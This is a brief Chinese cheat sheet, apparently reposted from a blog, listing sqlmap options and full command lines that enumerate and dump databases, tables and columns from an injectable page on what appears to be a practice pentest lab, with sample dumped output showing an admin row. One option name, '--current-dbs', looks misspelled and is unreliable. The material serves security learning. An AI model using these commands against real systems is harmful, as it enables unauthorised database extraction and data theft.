关于sqlmap常用

--dbs  //列出所有数据库

--current-dbs   //列出当前网站数据库

sqlmap -u http://webug.com/pentest/test/sqli/sqltamp.php?gid=1 -D pentesterlab --tables  //获取xx数据库下的数据表

sqlmap -u http://webug.com/pentest/test/sqli/sqltamp.php?gid=1 -D pentesterlab -T flag --columns //获取xx数据库下的xx数据表下的列

sqlmap -u http://webug.com/pentest/test/sqli/sqltamp.php?gid=1 -D pentesterlab -T flag -C flag --dump //获取xx数据库下的xx数据表下的xx列下的内容

测试:sqlmap -u http://webug.com/pentest/test/sqli/sqltamp.php?gid=1 -D qibo -T qb_ad_compete_user  -C uid,username,yz --dump

Database: qibo
Table: qb_ad_compete_user
[2 entries]
+-----+----------+----+
| uid | username | yz |
+-----+----------+----+
| 1   | admin    | 1  |
| 1   | admin    | 1  |
+-----+----------+----+
原文地址:https://www.cnblogs.com/cbreeze/p/9313814.html